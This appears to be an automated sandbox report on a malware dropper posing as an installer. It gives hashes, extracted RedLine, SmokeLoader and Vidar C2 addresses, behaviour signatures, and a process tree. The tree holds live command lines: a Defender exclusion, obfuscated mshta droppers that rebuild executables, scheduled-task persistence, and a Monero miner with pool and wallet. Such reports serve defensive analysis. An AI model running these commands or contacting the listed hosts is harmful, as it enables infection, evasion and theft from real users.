Resubmissions

05-10-2021 16:27

211005-tx24csaah9 10

04-10-2021 16:37

211004-t43cpsgfe7 10

04-10-2021 07:39

211004-jhgtrsfhf8 10

03-10-2021 18:09

211003-wryvvsffgk 10

02-10-2021 23:31

211002-3hwsgaehhl 10

02-10-2021 06:10

211002-gxfh5sdgg7 10

01-10-2021 13:44

211001-q16deabhek 10

Analysis

  • max time kernel
    701s
  • max time network
    688s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    03-10-2021 18:09

Errors

Reason
Remote task has failed: Machine shutdown

General

  • Target

    setup_x86_x64_install.exe

  • Size

    6.4MB

  • MD5

    c6e46aa3d6424b03e0a4ccb193d3eade

  • SHA1

    c8b49055743fa7b4d6a982aea26efb627bb1f2e1

  • SHA256

    5e2bf564a4f985a7482d505def1ec79c92566bf7eda4724811ee29b9c4a66156

  • SHA512

    06e0c7d8012d4dbf1e6ccb7049c16d3041eb792261cc9910115c8663a45272c90cbce0ccd51875b8cd465b8f5a5c9f69164cc665b60787884ac42aec3aa7d32e

Malware Config

Extracted

Family

redline

Botnet

jamesfuck

C2

65.108.20.195:6774

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Extracted

Family

smokeloader

Version

2020

C2

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.1

Botnet

933

C2

https://mas.to/@bardak1ho

Attributes
  • profile_id

    933

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 16 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 34 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 23 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 8 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 23 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 9 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:300
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
      • Drops file in System32 directory
      PID:1052
      • C:\Users\Admin\AppData\Roaming\atrhsfb
        C:\Users\Admin\AppData\Roaming\atrhsfb
        2⤵
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:5656
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
      1⤵
        PID:1100
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Themes
        1⤵
          PID:1176
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s SENS
          1⤵
            PID:1400
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1360
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1872
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                  PID:2520
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                  1⤵
                    PID:2556
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Browser
                    1⤵
                      PID:2748
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                      1⤵
                        PID:2796
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                        1⤵
                          PID:2788
                          • C:\Windows\system32\wbem\WMIADAP.EXE
                            wmiadap.exe /F /T /R
                            2⤵
                              PID:4500
                          • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:908
                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:608
                              • C:\Users\Admin\AppData\Local\Temp\7zS06239F91\setup_install.exe
                                "C:\Users\Admin\AppData\Local\Temp\7zS06239F91\setup_install.exe"
                                3⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of WriteProcessMemory
                                PID:1292
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2464
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                    5⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2208
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c Fri1034cd265b5e0adcd.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2576
                                  • C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri1034cd265b5e0adcd.exe
                                    Fri1034cd265b5e0adcd.exe
                                    5⤵
                                    • Executes dropped EXE
                                    PID:3172
                                    • C:\Windows\SysWOW64\mshta.exe
                                      "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri1034cd265b5e0adcd.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri1034cd265b5e0adcd.exe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )
                                      6⤵
                                        PID:2540
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri1034cd265b5e0adcd.exe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "" == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri1034cd265b5e0adcd.exe" ) do taskkill -F -Im "%~nXU"
                                          7⤵
                                            PID:4348
                                            • C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe
                                              SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
                                              8⤵
                                                PID:3488
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )
                                                  9⤵
                                                    PID:5908
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
                                                      10⤵
                                                        PID:6028
                                                    • C:\Windows\SysWOW64\mshta.exe
                                                      "C:\Windows\System32\mshta.exe" vBsCRipT: CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn ("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
                                                      9⤵
                                                        PID:5008
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
                                                          10⤵
                                                            PID:2572
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                                              11⤵
                                                                PID:4416
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
                                                                11⤵
                                                                  PID:3752
                                                                • C:\Windows\SysWOW64\control.exe
                                                                  control .\FUEj5.QM
                                                                  11⤵
                                                                    PID:4308
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
                                                                      12⤵
                                                                      • Loads dropped DLL
                                                                      PID:3848
                                                                      • C:\Windows\system32\RunDll32.exe
                                                                        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
                                                                        13⤵
                                                                          PID:4380
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
                                                                            14⤵
                                                                            • Loads dropped DLL
                                                                            PID:4928
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill -F -Im "Fri1034cd265b5e0adcd.exe"
                                                                8⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4552
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Fri10584c049c7f.exe
                                                        4⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2860
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri10584c049c7f.exe
                                                          Fri10584c049c7f.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:3872
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Fri106e757f6d75.exe
                                                        4⤵
                                                          PID:3832
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri106e757f6d75.exe
                                                            Fri106e757f6d75.exe
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:3844
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri106e757f6d75.exe
                                                              C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri106e757f6d75.exe
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Checks computer location settings
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2108
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c Fri1008c7d6874.exe
                                                          4⤵
                                                            PID:3640
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri1008c7d6874.exe
                                                              Fri1008c7d6874.exe
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:4036
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c Fri103a7805577.exe
                                                            4⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:732
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS06239F91\Fri103a7805577.exe
                                                              Fri103a7805577.exe
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:632
                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                6⤵
                                                                  PID:3028
                                                                  • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:4272
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                      8⤵
                                                                        PID:5724
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                          9⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:5796
                                                                      • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                        "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:5984
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                          9⤵
                                                                            PID:6776
                                                                            • C:\Windows\system32\schtasks.exe
                                                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                              10⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:5532
                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                            9⤵
                                                                            • Executes dropped EXE
                                                                            PID:6880
                                                                          • C:\Windows\explorer.exe
                                                                            C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                            9⤵
                                                                              PID:6668
                                                                        • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                          7⤵
                                                                            PID:4336
                                                                            • C:\Users\Admin\AppData\Roaming\5445679.scr
                                                                              "C:\Users\Admin\AppData\Roaming\5445679.scr" /S
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4120
                                                                            • C:\Users\Admin\AppData\Roaming\3814532.scr
                                                                              "C:\Users\Admin\AppData\Roaming\3814532.scr" /S
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious behavior: SetClipboardViewer
                                                                              PID:5344
                                                                            • C:\Users\Admin\AppData\Roaming\7278830.scr
                                                                              "C:\Users\Admin\AppData\Roaming\7278830.scr" /S
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              • Checks BIOS information in registry
                                                                              • Checks whether UAC is enabled
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              PID:3368
                                                                            • C:\Users\Admin\AppData\Roaming\2908069.scr
                                                                              "C:\Users\Admin\AppData\Roaming\2908069.scr" /S
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              • Checks BIOS information in registry
                                                                              • Checks whether UAC is enabled
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              PID:744
                                                                            • C:\Users\Admin\AppData\Roaming\4164826.scr
                                                                              "C:\Users\Admin\AppData\Roaming\4164826.scr" /S
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:5272
                                                                          • C:\Users\Admin\AppData\Local\Temp\inst001.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\inst001.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:4400
                                                                          • C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4628
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 336
                                                                              8⤵
                                                                              • Program crash
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4832
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 484
                                                                              8⤵
                                                                              • Program crash
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1668
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 528
                                                                              8⤵
                                                                              • Program crash
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4812
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 516
                                                                              8⤵
                                                                              • Program crash
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4588
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 588
                                                                              8⤵
                                                                              • Program crash
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4920
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 796
                                                                              8⤵
                                                                              • Program crash
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4624
                                                                          • C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks processor information in registry
                                                                            PID:4468
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im Firstoffer.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe" & del C:\ProgramData\*.dll & exit
                                                                              8⤵
                                                                                PID:4924
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /im Firstoffer.exe /f
                                                                                  9⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:4356
                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                  timeout /t 6
                                                                                  9⤵
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:2856
                                                                            • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:4856
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
                                                                                8⤵
                                                                                  PID:5920
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /im "setup.exe" /f
                                                                                    9⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:5984
                                                                              • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                                                                7⤵
                                                                                  PID:4992
                                                                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    PID:2824
                                                                                • C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:632
                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                    "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3028
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
                                                                                      9⤵
                                                                                        PID:3820
                                                                                        • C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
                                                                                          ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
                                                                                          10⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4408
                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                            "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )
                                                                                            11⤵
                                                                                              PID:3660
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
                                                                                                12⤵
                                                                                                  PID:3916
                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                "C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run ("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0 , trUE ) )
                                                                                                11⤵
                                                                                                  PID:5576
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
                                                                                                    12⤵
                                                                                                      PID:5936
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                                                                                        13⤵
                                                                                                          PID:1800
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
                                                                                                          13⤵
                                                                                                            PID:5612
                                                                                                          • C:\Windows\SysWOW64\control.exe
                                                                                                            control ..\kZ_AmsXL.6G
                                                                                                            13⤵
                                                                                                              PID:4412
                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
                                                                                                                14⤵
                                                                                                                  PID:5788
